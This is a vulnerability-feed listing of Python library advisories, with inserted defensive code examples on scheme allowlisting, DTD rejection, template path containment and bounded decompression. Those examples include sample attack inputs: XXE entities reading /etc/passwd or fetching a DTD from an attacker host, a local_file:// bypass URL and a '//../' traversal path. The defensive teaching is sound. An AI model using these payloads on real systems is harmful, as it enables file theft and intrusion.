798 matches found

Source: OSV
Added: 2026/04/28 4:32 p.m.

CLSA-2026-1777393949 python: Fix of CVE-2019-9948

CVE-2019-9948: fix urllib local_file:// URL scheme bypass that allowed file reads when the local_file handler was defined...

CVSS 9.1 | AI score 6.8 | EPSS 0.11844
Exploits: 1 | References: 1

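Worked example for the CVE-2019-9948 entry above (added here; it is not code from Python, OSV or the advisory). It contrasts the blocklist habit that the bug defeated with the allowlist that replaces it. The regex is the scheme-splitting pattern urllib.request used; the helper names and sample URLs are this example's own assumptions, and nothing is fetched.

```python
"""Scheme validation: blocklist vs allowlist (added example, not from the page's sources).

CVE-2019-9948: urllib's URLopener dispatched on the scheme it parsed with a
permissive regex and had an open_local_file handler, so a caller that only
blocked 'file:' still let local_file:///etc/passwd through. Helper names and
the sample URLs are assumptions made for this illustration; nothing is fetched.
"""
import re
from urllib.parse import urlsplit

# The scheme-splitting pattern urllib.request used: anything up to the first
# ':' that contains no '/' counts as a scheme, underscores included.
_LEGACY_TYPE = re.compile(r"([^/:]+):(.*)", re.DOTALL)


def legacy_splittype(url: str):
    """Scheme as the legacy regex saw it (lower-cased), or None."""
    m = _LEGACY_TYPE.match(url)
    return m.group(1).lower() if m else None


def blocklist_check(url: str) -> bool:
    """The inadequate pattern: reject only the one scheme you thought of.

    urlsplit does not even treat 'local_file' as a scheme ('_' is not a
    scheme character), so this check sees scheme '' and waves the URL
    through, while the legacy dispatcher would still have opened a local file.
    """
    return urlsplit(url).scheme != "file"


def allowlist_check(url: str, allowed=("http", "https")) -> bool:
    """The correct pattern: accept only schemes you intend to serve, and
    require a host so scheme-only or bare-path inputs are rejected too."""
    parts = urlsplit(url)
    return parts.scheme in allowed and bool(parts.netloc)


# Constructed inputs for the demonstration.
SAMPLE_URLS = (
    "https://example.org/report.pdf",
    "file:///etc/passwd",
    "FILE:///etc/passwd",
    "local_file:///etc/passwd",   # the CVE-2019-9948 bypass
    "ftp://example.org/x",
    "http:no-host-here",
)


def classify(urls=SAMPLE_URLS):
    """Map each URL to (legacy scheme, blocklist verdict, allowlist verdict)."""
    return {u: (legacy_splittype(u), blocklist_check(u), allowlist_check(u))
            for u in urls}


if __name__ == "__main__":
    for url, (scheme, block_ok, allow_ok) in classify().items():
        print(f"{url:30} legacy_scheme={scheme!s:12} "
              f"blocklist={'pass' if block_ok else 'reject'} "
              f"allowlist={'pass' if allow_ok else 'reject'}")
```

The point to carry away: two parsers disagreeing about what the scheme is (here urlsplit versus the legacy regex) is exactly the condition under which a blocklist fails, and an allowlist on the parsed scheme plus a required host is indifferent to that disagreement.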
Source: Fedora
Added: 2026/04/25 1:58 a.m.

[SECURITY] Fedora 44 Update: python-cairosvg-2.9.0-1.fc44

CairoSVG is an SVG 1.1 to PNG, PDF, PS and SVG converter which can also be used as a Python library...

CVSS 7.5 | AI score 5.2 | EPSS 0.0049
Exploits: 2

Source: OSV
Added: 2026/04/24 8:16 p.m.

DEBIAN-CVE-2026-41425

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to 1.6.11, there is no CSRF protection on the cache feature in authlib.integrations.starlette_client.OAuth. This vulnerability is fixed in 1.6.11...

CVSS 5.4 | AI score 5.3 | EPSS 0.00106
Exploits: 1 | References: 1

Source: UbuntuCve
Added: 2026/04/24 8:16 p.m.

CVE-2026-41425

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to 1.6.11, there is no CSRF protection on the cache feature in authlib.integrations.starlette_client.OAuth. This vulnerability is fixed in 1.6.11...

CVSS 5.4 | AI score 5.8 | EPSS 0.00106
Exploits: 1 | References: 2

Source: OSV
Added: 2026/04/24 8:16 p.m.

UBUNTU-CVE-2026-41425

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to 1.6.11, there is no CSRF protection on the cache feature in authlib.integrations.starlette_client.OAuth. This vulnerability is fixed in 1.6.11...

CVSS 5.4 | AI score 5.8 | EPSS 0.00106
Exploits: 1 | References: 3

Source: OSV
Added: 2026/04/24 5:16 p.m.

PYSEC-2026-87

lxml is a library for processing XML and HTML in the Python language. Prior to 6.1.0, using either of the two parsers in the default configuration with resolve_entities=True allows untrusted XML input to read local files. Setting the resolve_entities option explicitly to resolve_entities='internal' ...

CVSS 7.5 | AI score 5.8 | EPSS 0.00262
Exploits: 1 | References: 2

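Worked example for the PYSEC-2026-87 entry above (added here; it is not lxml's code or the advisory's). The durable fix is the parser option the advisory names (lxml's etree.XMLParser takes resolve_entities; earlier releases accept False, 6.1.0 adds the 'internal' value). The stdlib scan below is a separate defence-in-depth layer for code that cannot upgrade yet: untrusted documents almost never need a DTD, so any DOCTYPE or entity declaration is refused before the document reaches a feature-rich parser. The class and function names and the sample payloads are this example's own.

```python
"""Reject DTDs before parsing untrusted XML (added example; not lxml's code).

The PYSEC-2026-87 entry is about lxml resolving entities by default, so an
attacker's <!ENTITY xxe SYSTEM "file:///etc/passwd"> reads a local file.
expat never fetches external entities unless a handler asks it to, so
scanning with it is safe; only declaration callbacks are installed here.
Payloads are constructed for the demonstration.
"""
import xml.parsers.expat


class DtdRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or entity declaration."""


def reject_dtd(xml_bytes: bytes) -> None:
    """Raise DtdRejected on the first DOCTYPE or <!ENTITY> seen."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DtdRejected(f"DOCTYPE {name!r} is not allowed in untrusted XML")

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        kind = "parameter entity" if is_param else "entity"
        raise DtdRejected(f"{kind} {name!r} (system id {system_id!r}) is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_bytes, True)


def is_safe_to_parse(xml_bytes: bytes) -> bool:
    """True only for well-formed XML with no DTD; malformed input is unsafe too."""
    try:
        reject_dtd(xml_bytes)
    except (DtdRejected, xml.parsers.expat.ExpatError):
        return False
    return True


# Constructed samples: the classic local-file XXE, an out-of-band parameter
# entity, and a benign document.
XXE_LOCAL_FILE = b"""<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>"""

PARAMETER_ENTITY = b"""<!DOCTYPE data [ <!ENTITY % ext SYSTEM "http://attacker.invalid/evil.dtd"> %ext; ]>
<data/>"""

BENIGN = b"<data><item>hello</item></data>"

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("xxe", XXE_LOCAL_FILE),
                       ("param", PARAMETER_ENTITY)):
        print(f"{label:7} safe={is_safe_to_parse(doc)}")
```

Run the scan on the raw bytes before handing them to lxml; it costs one extra pass over the input and fails closed on malformed documents as well as on declarations.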
Source: OSV
Added: 2026/04/24 12:00 a.m.

UBUNTU-CVE-2026-41205

Mako is a template library written in Python. Prior to 1.3.11, TemplateLookup.get_template is vulnerable to path traversal when a URI starts with //, e.g. //../../../secret.txt. The root cause is an inconsistency between two slash-stripping implementations. Any file readable by the process can be...

CVSS 8.7 | AI score 5.8 | EPSS 0.00361
Exploits: 0 | References: 4

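Worked example for the UBUNTU-CVE-2026-41205 entry above (added here; it is not Mako's code or the advisory's). fragile_resolve is a hypothetical sketch of the shape the advisory describes, two slash-stripping routines that disagree on a leading //, written only to reproduce the described symptom; it is not Mako's implementation. contained_resolve is the check to keep: normalise the final path and prove it still lies under the root. The root directory and URIs are constructed and nothing touches the filesystem.

```python
"""Path containment for template URIs (added example; not Mako's code).

posixpath is used throughout so the demonstration behaves the same on every
platform. TEMPLATE_ROOT and the sample URIs are assumptions.
"""
import posixpath

TEMPLATE_ROOT = "/srv/app/templates"   # assumed for the demonstration


def fragile_resolve(uri: str, root: str = TEMPLATE_ROOT) -> str:
    """Hypothetical sketch: two slash-stripping routines that disagree on '//'."""
    # Guard: strips ONE leading slash, then refuses anything climbing out.
    guarded = uri[1:] if uri.startswith("/") else uri
    if posixpath.normpath(guarded).startswith(".."):
        raise PermissionError(f"rejected by guard: {uri!r}")
    # Builder: strips ALL leading slashes. For '//../x' the guard saw '/../x'
    # (absolute, so normpath gives '/x' and no '..' survives) while the
    # builder sees '../x' and joins it under root: the root is escaped.
    relative = uri.lstrip("/")
    return posixpath.normpath(posixpath.join(root, relative))


def contained_resolve(uri: str, root: str = TEMPLATE_ROOT) -> str:
    """Normalise once, then check the result rather than the input."""
    candidate = posixpath.normpath(posixpath.join(root, uri.lstrip("/")))
    if posixpath.commonpath([root, candidate]) != root:
        raise PermissionError(f"template uri escapes root: {uri!r}")
    return candidate


def verdict(resolver, uri: str) -> str:
    """Resolved path, or the string 'REJECTED' when the resolver refuses."""
    try:
        return resolver(uri)
    except PermissionError:
        return "REJECTED"


if __name__ == "__main__":
    for uri in ("/pages/index.html", "//pages/index.html",
                "/../../../secret.txt", "//../../../secret.txt"):
        print(f"{uri:25} fragile={verdict(fragile_resolve, uri):38} "
              f"contained={verdict(contained_resolve, uri)}")
```

The containment check is lexical. If the template root can contain symlinks that point outside it, resolve both sides with os.path.realpath before the commonpath comparison.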
Source: OSV
Added: 2026/04/22 10:16 p.m.

UBUNTU-CVE-2026-41314

pypdf is a free and open-source pure-python PDF library. An attacker who uses a vulnerability present in versions prior to 6.10.2 can craft a PDF which leads to the RAM being exhausted. This requires accessing an image using /FlateDecode with large size values. This has been fixed in pypdf 6.10.2...

CVSS 6.5 | AI score 5.7 | EPSS 0.00226
Exploits: 0 | References: 4

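Worked example for the pypdf resource-exhaustion entries on this page (UBUNTU-CVE-2026-41314 above, and the cross-reference and XMP entries further down), added here and not pypdf's code. They share one root cause: the parser trusts a size the attacker controls. For an image stream the defence is to derive the byte budget from the declared /Width, /Height, /BitsPerComponent and colour components, cap that budget, and then inflate with a hard output ceiling so a few kilobytes that expand to gigabytes are cut off at the cap. The cap value, helper names and the constructed "bomb" are this example's own.

```python
"""Bounded FlateDecode (added example; not pypdf's code).

MAX_IMAGE_BYTES is an assumed policy cap; the inputs at the bottom are
constructed for the demonstration.
"""
import zlib

MAX_IMAGE_BYTES = 64 * 1024 * 1024   # assumed policy cap for one image


class DecompressionLimit(ValueError):
    """Raised when a stream would inflate past the permitted size."""


def bounded_inflate(data: bytes, max_output: int) -> bytes:
    """Inflate a zlib stream, raising once output would exceed max_output.

    Each call asks for at most (room + 1) bytes: an exact-size stream can
    still reach its end marker, while a single surplus byte proves overflow
    before any oversized buffer is allocated.
    """
    d = zlib.decompressobj()
    out = bytearray()
    pending = data
    while not d.eof:
        chunk = d.decompress(pending, max_output - len(out) + 1)
        out += chunk
        if len(out) > max_output:
            raise DecompressionLimit(f"stream inflates past {max_output} bytes")
        pending = d.unconsumed_tail
        if not chunk and not pending:
            break   # truncated stream: nothing left to make progress with
    return bytes(out)


def expected_image_bytes(width: int, height: int, components: int,
                         bits_per_component: int) -> int:
    """Uncompressed size a PDF image of these dimensions must have."""
    if min(width, height, components, bits_per_component) <= 0:
        raise ValueError("image dimensions must be positive")
    row_bytes = (width * components * bits_per_component + 7) // 8
    return row_bytes * height


def decode_image_stream(raw: bytes, width: int, height: int, components: int = 1,
                        bits_per_component: int = 8, cap: int = MAX_IMAGE_BYTES) -> bytes:
    """Reject oversized declared dimensions first, then inflate to exactly that budget."""
    need = expected_image_bytes(width, height, components, bits_per_component)
    if need > cap:
        raise DecompressionLimit(f"declared image needs {need} bytes, cap is {cap}")
    pixels = bounded_inflate(raw, need)
    if len(pixels) != need:
        raise ValueError(f"stream yields {len(pixels)} bytes, expected {need}")
    return pixels


def inflated_size(data: bytes, max_output: int):
    """Inflated length, or None when the stream exceeds max_output."""
    try:
        return len(bounded_inflate(data, max_output))
    except DecompressionLimit:
        return None


# Constructed inputs: a 4x4 8-bit grey image, and 16 MiB of zeros that
# compress to a few kilobytes.
SMALL_IMAGE = zlib.compress(b"\x7f" * 16)
BOMB_SIZE = 16 * 1024 * 1024
BOMB = zlib.compress(b"\x00" * BOMB_SIZE)

if __name__ == "__main__":
    print(len(BOMB), "compressed bytes ->", inflated_size(BOMB, BOMB_SIZE), "inflated")
    print("with a 1 MiB cap:", inflated_size(BOMB, 1 << 20))
    print("4x4 image:", decode_image_stream(SMALL_IMAGE, 4, 4))
```

The same two-step shape (bound the declared size, then bound the actual work) is what the cross-reference /Size and object-stream /N entries call for: never allocate or loop on a count from the file without checking it against what the file could physically contain.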
Source: UbuntuCve
Added: 2026/04/22 9:17 p.m.

CVE-2026-41168

pypdf is a free and open-source pure-python PDF library. An attacker who uses a vulnerability present in versions prior to 6.10.1 can craft a PDF which leads to long runtimes. This requires cross-reference streams with wrong large /Size values or object streams with wrong large /N values. This ha...

CVSS 6.9 | AI score 5.7 | EPSS 0.00297
Exploits: 0 | References: 3

Source: Cvelist
Added: 2026/04/20 7:20 p.m.

CVE-2026-6550 Key commitment policy bypass via shared key cache in AWS Encryption SDK for Python

Cryptographic algorithm downgrade in the caching layer of Amazon AWS Encryption SDK for Python before version 3.3.1 and before version 4.0.5 might allow an authenticated local threat actor to bypass key commitment policy enforcement via a shared key cache, resulting in ciphertext that can be...

CVSS 5.7 | EPSS 0.00096
Exploits: 0 | References: 4

Source: vulnersOsv
Added: 2026/04/20 12:30 a.m.

agentic-layer-testbench (>=0.9.1 <=0.9.2), agentic-rag-pdf (>=0.1.2 <=0.1.5) +55 more potentially affected by CVE-2025-45691 +1 more via ragas (>=0.2.6 <=0.4.3)

ragas PYPI version =0.2.6, =0.9.1, =0.1.2, =0.1.0a1, =1.0.8, =0.1.6, =11.1.12, =0.20.24, =0.1.1, =1.0.0, =1.1.0, =0.1.0, =0.1.0, =0.1.0b1, =2.0.0 and more. Source CVEs: CVE-2025-45691, CVE-2026-6587. Source advisory: SNYK:PYTHON-RAGAS-16134617...

CVSS 7.5 | AI score 6.5 | EPSS 0.00517
Exploits: 1

Source: UbuntuCve
Added: 2026/04/17 12:00 a.m.

CVE-2026-40260

pypdf is a free and open-source pure-python PDF library. In versions prior to 6.10.0, manipulated XMP metadata entity declarations can exhaust RAM. An attacker who exploits this vulnerability can craft a PDF which leads to large memory usage. This requires parsing the XMP metadata. This issue has...

CVSS 6.9 | AI score 5.8 | EPSS 0.00423
Exploits: 0 | References: 3

Source: Redos
Added: 2026/04/17 12:00 a.m.

ROS-20260417-73-0014

Vulnerability in python-PyPDF2 related to unrestricted resource allocation. Exploitation of the vulnerability could allow an attacker acting remotely to cause a denial of service...

CVSS 6.9 | AI score 5.8 | EPSS 0.00168
Exploits: 0

Source: vulnersOsv
Added: 2026/04/16 9:30 p.m.

3m (>=0.1.0 <=0.1.3), a2d-diary (>=0.1.0 <=0.1.5) +1779 more potentially affected by CVE-2026-41313 via pypdf2 (>=1.24.0 <=3.0.1)

pypdf2 PYPI version =1.24.0, =0.1.0, =0.1.0, =1.1.0, =0.0.0.1, =0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.2, =0.0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.1, =0.0.0.1038 and more. Source CVEs: CVE-2026-41313. Source advisory: SNYK:PYTHON-PYPDF2-16097904...

CVSS 6.5 | AI score 5.4 | EPSS 0.00214
Exploits: 0

Source: vulnersOsv
Added: 2026/04/16 9:16 p.m.

adoc (>=0.1.0 <=0.1.5), adr (>=0.4.0 <=0.4.1) +231 more potentially affected by CVE-2026-41205 via mako (>=1.0.1 <=1.3.10)

mako PYPI version =1.0.1, =0.1.0, =0.4.0, =0.1.0, =1.0.4, =0.0.1, =0.7.0, =1.0.1, =0.1.2, =0.1.0, =0.3.24, =0.1.0, =0.1.1, =0.1.6 and more. Source CVEs: CVE-2026-41205. Source advisory: SNYK:PYTHON-MAKO-16098253...

CVSS 8.7 | AI score 5.4 | EPSS 0.00361
Exploits: 0

Source: Fedora
Added: 2026/04/16 12:56 a.m.

[SECURITY] Fedora 43 Update: python-cairosvg-2.9.0-1.fc43

CairoSVG is an SVG 1.1 to PNG, PDF, PS and SVG converter which can also be used as a Python library...

CVSS 7.5 | AI score 5.8 | EPSS 0.0049
Exploits: 2

Source: vulnersOsv
Added: 2026/04/16 12:29 a.m.

aws-credential-process (=0.20.0), aws-session-daemon (>=0.1.0 <=0.6.0) +2 more potentially affected by CVE-2026-40947 via yubikey-manager (>=5.0.0 <=5.1.1)

yubikey-manager PYPI version =5.0.0, =0.1.0, =1.0.0, =1.6.6. Source CVEs: CVE-2026-40947. Source advisory: SNYK:PYTHON-YUBIKEYMANAGER-16325204...

CVSS 2.9 | AI score 5.8 | EPSS 0.00131
Exploits: 0

Source: OSV
Added: 2026/04/14 9:55 p.m.

MAL-2026-2671 Malicious code in kryptex-os (PyPI)

Reporting source: kam193 (034201cad27492b279f5c274a5091b2e617da50f27125c7774db069256b3486e). Clones of legitimate libraries with malicious modifications intended to download malicious remote code. The remote script allows executing arbitrary files...

AI score 6
Exploits: 0 | References: 1

Source: vulnersOsv
Added: 2026/04/10 7:20 p.m.

article-extractor (=0.5.8), nscraper (>=0.1.0 <=0.1.5) potentially affected by unknown CVE via justhtml (>=1.13.0 <=1.14.0)

justhtml PYPI version =1.13.0, =0.1.0, =0.1.5. Source CVEs: unknown CVE. Source advisory: SNYK:PYTHON-JUSTHTML-16032358...

AI score 5.8
Exploits: 0

Source: vulnersOsv
Added: 2026/04/10 5:08 p.m.

adversarial-attacks-white-black-box (=0.1.7), datagenkit (=0.1.1) +37 more potentially affected by CVE-2026-40086 via rembg (>=2.0.57 <=2.0.69)

rembg PYPI version =2.0.57, =0.0.3, =1.0.0, =1.9.2, =5.1.6, =2.12.0, =1.0.0, =0.1.0, =1.0.3, =0.0.7, =2.0.0, =1.0.0, =1.0.0, =1.0.4 and more. Source CVEs: CVE-2026-40086. Source advisory: SNYK:PYTHON-REMBG-15969263...

CVSS 5.3 | AI score 5.8 | EPSS 0.00592
Exploits: 1
